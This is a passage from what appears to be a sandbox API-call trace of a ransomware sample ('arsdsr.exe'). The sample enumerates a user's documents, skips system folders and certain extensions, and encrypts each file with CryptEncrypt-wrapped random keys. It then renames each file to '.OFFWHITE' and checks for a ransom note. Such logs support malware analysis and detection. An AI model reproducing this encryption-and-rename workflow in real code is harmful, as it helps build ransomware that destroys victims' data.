lpNumberOfBytesRead=0x295c4c0*=0x117f4, lpOverlapped=0x0) returned 1 [0133.175] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.176] WriteFile (in: hFile=0x20c, lpBuffer=0x55e7d8*, nNumberOfBytesToWrite=0x117f4, lpNumberOfBytesWritten=0x295c4cc, lpOverlapped=0x0 | out: lpBuffer=0x55e7d8*, lpNumberOfBytesWritten=0x295c4cc*=0x117f4, lpOverlapped=0x0) returned 1 [0133.176] GetProcessHeap () returned 0x500000 [0133.176] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55e7d8 | out: hHeap=0x500000) returned 1 [0133.176] CloseHandle (hObject=0x20c) returned 1 [0133.181] GetProcessHeap () returned 0x500000 [0133.181] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0133.181] GetProcessHeap () returned 0x500000 [0133.181] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0133.181] GetProcessHeap () returned 0x500000 [0133.181] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0133.181] GetProcessHeap () returned 0x500000 [0133.181] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0133.181] lstrcpyW (in: lpString1=0x295c2b8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\xd1gnEP a8wg_\\1uzealkfywlQgvf.csv" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\xd1gnEP a8wg_\\1uzealkfywlQgvf.csv") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\xd1gnEP a8wg_\\1uzealkfywlQgvf.csv" [0133.181] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\xd1gnEP a8wg_\\1uzealkfywlQgvf.csv", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\xd1gnEP a8wg_\\1uzealkfywlQgvf.csv.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\xd1gnEP a8wg_\\1uzealkfywlQgvf.csv.OFFWHITE" [0133.181] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\xd1gnEP a8wg_\\1uzealkfywlQgvf.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bk4kizkgwa\\yqokdnbo_856wnmn\\kb-m\\az8e0ld0z\\xd1gnep a8wg_\\1uzealkfywlqgvf.csv"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\xd1gnEP a8wg_\\1uzealkfywlQgvf.csv.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bk4kizkgwa\\yqokdnbo_856wnmn\\kb-m\\az8e0ld0z\\xd1gnep a8wg_\\1uzealkfywlqgvf.csv.offwhite")) returned 1 [0133.182] FindNextFileW (in: hFindFile=0x5447d0, lpFindFileData=0x295c518 | out: lpFindFileData=0x295c518*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x882b5310, ftCreationTime.dwHighDateTime=0x1d5dee7, ftLastAccessTime.dwLowDateTime=0xf59d8670, ftLastAccessTime.dwHighDateTime=0x1d5dfaf, ftLastWriteTime.dwLowDateTime=0xf59d8670, ftLastWriteTime.dwHighDateTime=0x1d5dfaf, nFileSizeHigh=0x0, nFileSizeLow=0xaadb, dwReserved0=0x295c4bc, dwReserved1=0x53dc9589, cFileName="DiHsZd6k 1.pdf", cAlternateFileName="DIHSZD~1.PDF")) returned 1 [0133.182] lstrcmpiW (lpString1="DiHsZd6k 1.pdf", lpString2=".") returned 1 [0133.182] lstrcmpiW (lpString1="DiHsZd6k 1.pdf", lpString2="..") returned 1 [0133.182] lstrcmpiW (lpString1="DiHsZd6k 1.pdf", lpString2="...") returned 1 [0133.182] lstrcmpiW (lpString1="DiHsZd6k 1.pdf", lpString2="windows") returned -1 [0133.182] lstrcmpiW (lpString1="DiHsZd6k 1.pdf", lpString2="$recycle.bin") returned 1 [0133.183] lstrcmpiW (lpString1="DiHsZd6k 1.pdf", lpString2="rsa") returned -1 [0133.183] lstrcmpiW (lpString1="DiHsZd6k 1.pdf", lpString2="ntuser.dat") returned -1 [0133.183] lstrcmpiW (lpString1="DiHsZd6k 1.pdf", lpString2="programdata") returned -1 [0133.183] lstrcmpiW (lpString1="DiHsZd6k 1.pdf", lpString2="appdata") returned 1 [0133.183] lstrcmpiW (lpString1="DiHsZd6k 1.pdf", lpString2="program files") returned -1 [0133.183] lstrcmpiW (lpString1="DiHsZd6k 1.pdf", lpString2="program files (x86)") returned -1 [0133.183] lstrcpyW (in: lpString1=0x295c768, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\xd1gnEP a8wg_\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\xd1gnEP a8wg_\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\xd1gnEP a8wg_\\" [0133.183] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\xd1gnEP a8wg_\\", lpString2="DiHsZd6k 1.pdf" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\xd1gnEP a8wg_\\DiHsZd6k 1.pdf") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\xd1gnEP a8wg_\\DiHsZd6k 1.pdf" [0133.183] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.183] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.183] PathFindExtensionW (pszPath="DiHsZd6k 1.pdf") returned=".pdf" [0133.183] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0133.183] lstrcmpiW (lpString1=".pdf", lpString2=".log") returned 1 [0133.183] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0133.183] lstrcmpiW (lpString1=".pdf", lpString2=".cmd") returned 1 [0133.183] lstrcmpiW (lpString1=".pdf", lpString2=".com") returned 1 [0133.183] lstrcmpiW (lpString1=".pdf", lpString2=".cpl") returned 1 [0133.183] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0133.183] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0133.183] lstrcmpiW (lpString1=".pdf", lpString2=".url") returned -1 [0133.183] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0133.183] lstrcmpiW (lpString1=".pdf", lpString2=".mp3") returned 1 [0133.184] lstrcmpiW (lpString1=".pdf", lpString2=".pif") returned -1 [0133.184] lstrcmpiW (lpString1=".pdf", lpString2=".mp4") returned 1 [0133.184] lstrcmpiW (lpString1=".pdf", lpString2=".OFFWHITE") returned 1 [0133.184] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0133.184] lstrcmpiW (lpString1="DiHsZd6k 1.pdf", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0133.184] GetProcessHeap () returned 0x500000 [0133.184] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x53f6d8 [0133.184] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\xd1gnEP a8wg_\\DiHsZd6k 1.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bk4kizkgwa\\yqokdnbo_856wnmn\\kb-m\\az8e0ld0z\\xd1gnep a8wg_\\dihszd6k 1.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0133.185] GetFileSizeEx (in: hFile=0x20c, lpFileSize=0x295c4e0 | out: lpFileSize=0x295c4e0*=43739) returned 1 [0133.185] GetProcessHeap () returned 0x500000 [0133.185] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0133.185] GetProcessHeap () returned 0x500000 [0133.185] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0133.186] GetProcessHeap () returned 0x500000 [0133.186] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0133.186] GetProcessHeap () returned 0x500000 [0133.186] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0133.186] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.186] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.186] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0133.186] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.186] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.186] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0133.186] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.186] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.186] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295c290*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295c290*=0x100) returned 1 [0133.186] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.186] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.186] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295c28c*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295c28c*=0x100) returned 1 [0133.187] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0xaadb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.187] SetLastError (dwErrCode=0x0) [0133.187] WriteFile (in: hFile=0x20c, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295c4cc, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295c4cc*=0x100, lpOverlapped=0x0) returned 1 [0133.189] GetLastError () returned 0x0 [0133.189] GetLastError () returned 0x0 [0133.189] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0xabdb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.189] WriteFile (in: hFile=0x20c, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295c4cc, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295c4cc*=0x100, lpOverlapped=0x0) returned 1 [0133.189] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0xacdb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.189] WriteFile (in: hFile=0x20c, lpBuffer=0x53f6d8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295c4cc, lpOverlapped=0x0 | out: lpBuffer=0x53f6d8*, lpNumberOfBytesWritten=0x295c4cc*=0x8, lpOverlapped=0x0) returned 1 [0133.189] GetProcessHeap () returned 0x500000 [0133.189] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0xaadb) returned 0x55e7d8 [0133.190] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.190] ReadFile (in: hFile=0x20c, lpBuffer=0x55e7d8, nNumberOfBytesToRead=0xaadb, lpNumberOfBytesRead=0x295c4c0, lpOverlapped=0x0 | out: lpBuffer=0x55e7d8*, lpNumberOfBytesRead=0x295c4c0*=0xaadb, lpOverlapped=0x0) returned 1 [0133.193] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.193] WriteFile (in: hFile=0x20c, lpBuffer=0x55e7d8*, nNumberOfBytesToWrite=0xaadb, lpNumberOfBytesWritten=0x295c4cc, lpOverlapped=0x0 | out: lpBuffer=0x55e7d8*, lpNumberOfBytesWritten=0x295c4cc*=0xaadb, lpOverlapped=0x0) returned 1 [0133.193] GetProcessHeap () returned 0x500000 [0133.193] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55e7d8 | out: hHeap=0x500000) returned 1 [0133.193] CloseHandle (hObject=0x20c) returned 1 [0133.205] GetProcessHeap () returned 0x500000 [0133.205] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0133.205] GetProcessHeap () returned 0x500000 [0133.205] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0133.205] GetProcessHeap () returned 0x500000 [0133.205] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0133.205] GetProcessHeap () returned 0x500000 [0133.205] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0133.205] lstrcpyW (in: lpString1=0x295c2b8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\xd1gnEP a8wg_\\DiHsZd6k 1.pdf" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\xd1gnEP a8wg_\\DiHsZd6k 1.pdf") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\xd1gnEP a8wg_\\DiHsZd6k 1.pdf" [0133.205] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\xd1gnEP a8wg_\\DiHsZd6k 1.pdf", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\xd1gnEP a8wg_\\DiHsZd6k 1.pdf.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\xd1gnEP a8wg_\\DiHsZd6k 1.pdf.OFFWHITE" [0133.206] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\xd1gnEP a8wg_\\DiHsZd6k 1.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bk4kizkgwa\\yqokdnbo_856wnmn\\kb-m\\az8e0ld0z\\xd1gnep a8wg_\\dihszd6k 1.pdf"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\xd1gnEP a8wg_\\DiHsZd6k 1.pdf.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bk4kizkgwa\\yqokdnbo_856wnmn\\kb-m\\az8e0ld0z\\xd1gnep a8wg_\\dihszd6k 1.pdf.offwhite")) returned 1 [0133.209] FindNextFileW (in: hFindFile=0x5447d0, lpFindFileData=0x295c518 | out: lpFindFileData=0x295c518*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90aabdc0, ftCreationTime.dwHighDateTime=0x1d5e63d, ftLastAccessTime.dwLowDateTime=0x20c42940, ftLastAccessTime.dwHighDateTime=0x1d5e036, ftLastWriteTime.dwLowDateTime=0x20c42940, ftLastWriteTime.dwHighDateTime=0x1d5e036, nFileSizeHigh=0x0, nFileSizeLow=0x10868, dwReserved0=0x295c4bc, dwReserved1=0x53dc9589, cFileName="me1jQJbh7TN.ods", cAlternateFileName="ME1JQJ~1.ODS")) returned 1 [0133.209] lstrcmpiW (lpString1="me1jQJbh7TN.ods", lpString2=".") returned 1 [0133.209] lstrcmpiW (lpString1="me1jQJbh7TN.ods", lpString2="..") returned 1 [0133.209] lstrcmpiW (lpString1="me1jQJbh7TN.ods", lpString2="...") returned 1 [0133.209] lstrcmpiW (lpString1="me1jQJbh7TN.ods", lpString2="windows") returned -1 [0133.209] lstrcmpiW (lpString1="me1jQJbh7TN.ods", lpString2="$recycle.bin") returned 1 [0133.209] lstrcmpiW (lpString1="me1jQJbh7TN.ods", lpString2="rsa") returned -1 [0133.209] lstrcmpiW (lpString1="me1jQJbh7TN.ods", lpString2="ntuser.dat") returned -1 [0133.209] lstrcmpiW (lpString1="me1jQJbh7TN.ods", lpString2="programdata") returned -1 [0133.209] lstrcmpiW (lpString1="me1jQJbh7TN.ods", lpString2="appdata") returned 1 [0133.209] lstrcmpiW (lpString1="me1jQJbh7TN.ods", lpString2="program files") returned -1 [0133.209] lstrcmpiW (lpString1="me1jQJbh7TN.ods", lpString2="program files (x86)") returned -1 [0133.209] lstrcpyW (in: lpString1=0x295c768, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\xd1gnEP a8wg_\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\xd1gnEP a8wg_\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\xd1gnEP a8wg_\\" [0133.209] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\xd1gnEP a8wg_\\", lpString2="me1jQJbh7TN.ods" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\xd1gnEP a8wg_\\me1jQJbh7TN.ods") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\xd1gnEP a8wg_\\me1jQJbh7TN.ods" [0133.209] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.209] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.209] PathFindExtensionW (pszPath="me1jQJbh7TN.ods") returned=".ods" [0133.209] lstrcmpiW (lpString1=".ods", lpString2=".exe") returned 1 [0133.209] lstrcmpiW (lpString1=".ods", lpString2=".log") returned 1 [0133.209] lstrcmpiW (lpString1=".ods", lpString2=".cab") returned 1 [0133.210] lstrcmpiW (lpString1=".ods", lpString2=".cmd") returned 1 [0133.210] lstrcmpiW (lpString1=".ods", lpString2=".com") returned 1 [0133.210] lstrcmpiW (lpString1=".ods", lpString2=".cpl") returned 1 [0133.210] lstrcmpiW (lpString1=".ods", lpString2=".ini") returned 1 [0133.210] lstrcmpiW (lpString1=".ods", lpString2=".dll") returned 1 [0133.210] lstrcmpiW (lpString1=".ods", lpString2=".url") returned -1 [0133.210] lstrcmpiW (lpString1=".ods", lpString2=".ttf") returned -1 [0133.210] lstrcmpiW (lpString1=".ods", lpString2=".mp3") returned 1 [0133.210] lstrcmpiW (lpString1=".ods", lpString2=".pif") returned -1 [0133.210] lstrcmpiW (lpString1=".ods", lpString2=".mp4") returned 1 [0133.210] lstrcmpiW (lpString1=".ods", lpString2=".OFFWHITE") returned -1 [0133.210] lstrcmpiW (lpString1=".ods", lpString2=".msi") returned 1 [0133.210] lstrcmpiW (lpString1="me1jQJbh7TN.ods", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0133.210] GetProcessHeap () returned 0x500000 [0133.210] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x53f6e8 [0133.210] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\xd1gnEP a8wg_\\me1jQJbh7TN.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bk4kizkgwa\\yqokdnbo_856wnmn\\kb-m\\az8e0ld0z\\xd1gnep a8wg_\\me1jqjbh7tn.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0133.211] GetFileSizeEx (in: hFile=0x20c, lpFileSize=0x295c4e0 | out: lpFileSize=0x295c4e0*=67688) returned 1 [0133.211] GetProcessHeap () returned 0x500000 [0133.211] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0133.211] GetProcessHeap () returned 0x500000 [0133.211] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0133.211] GetProcessHeap () returned 0x500000 [0133.211] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0133.211] GetProcessHeap () returned 0x500000 [0133.211] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0133.211] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.211] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.211] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0133.211] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.211] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.211] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0133.211] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.211] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.211] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295c290*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295c290*=0x100) returned 1 [0133.212] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.212] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.212] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295c28c*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295c28c*=0x100) returned 1 [0133.212] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x10868, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.212] SetLastError (dwErrCode=0x0) [0133.212] WriteFile (in: hFile=0x20c, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295c4cc, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295c4cc*=0x100, lpOverlapped=0x0) returned 1 [0133.214] GetLastError () returned 0x0 [0133.214] GetLastError () returned 0x0 [0133.214] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x10968, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.214] WriteFile (in: hFile=0x20c, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295c4cc, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295c4cc*=0x100, lpOverlapped=0x0) returned 1 [0133.214] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x10a68, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.215] WriteFile (in: hFile=0x20c, lpBuffer=0x53f6e8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295c4cc, lpOverlapped=0x0 | out: lpBuffer=0x53f6e8*, lpNumberOfBytesWritten=0x295c4cc*=0x8, lpOverlapped=0x0) returned 1 [0133.215] GetProcessHeap () returned 0x500000 [0133.215] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10868) returned 0x55e7d8 [0133.215] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.215] ReadFile (in: hFile=0x20c, lpBuffer=0x55e7d8, nNumberOfBytesToRead=0x10868, lpNumberOfBytesRead=0x295c4c0, lpOverlapped=0x0 | out: lpBuffer=0x55e7d8*, lpNumberOfBytesRead=0x295c4c0*=0x10868, lpOverlapped=0x0) returned 1 [0133.220] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.220] WriteFile (in: hFile=0x20c, lpBuffer=0x55e7d8*, nNumberOfBytesToWrite=0x10868, lpNumberOfBytesWritten=0x295c4cc, lpOverlapped=0x0 | out: lpBuffer=0x55e7d8*, lpNumberOfBytesWritten=0x295c4cc*=0x10868, lpOverlapped=0x0) returned 1 [0133.221] GetProcessHeap () returned 0x500000 [0133.221] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55e7d8 | out: hHeap=0x500000) returned 1 [0133.221] CloseHandle (hObject=0x20c) returned 1 [0133.225] GetProcessHeap () returned 0x500000 [0133.225] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0133.225] GetProcessHeap () returned 0x500000 [0133.225] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0133.225] GetProcessHeap () returned 0x500000 [0133.225] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0133.225] GetProcessHeap () returned 0x500000 [0133.225] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0133.225] lstrcpyW (in: lpString1=0x295c2b8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\xd1gnEP a8wg_\\me1jQJbh7TN.ods" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\xd1gnEP 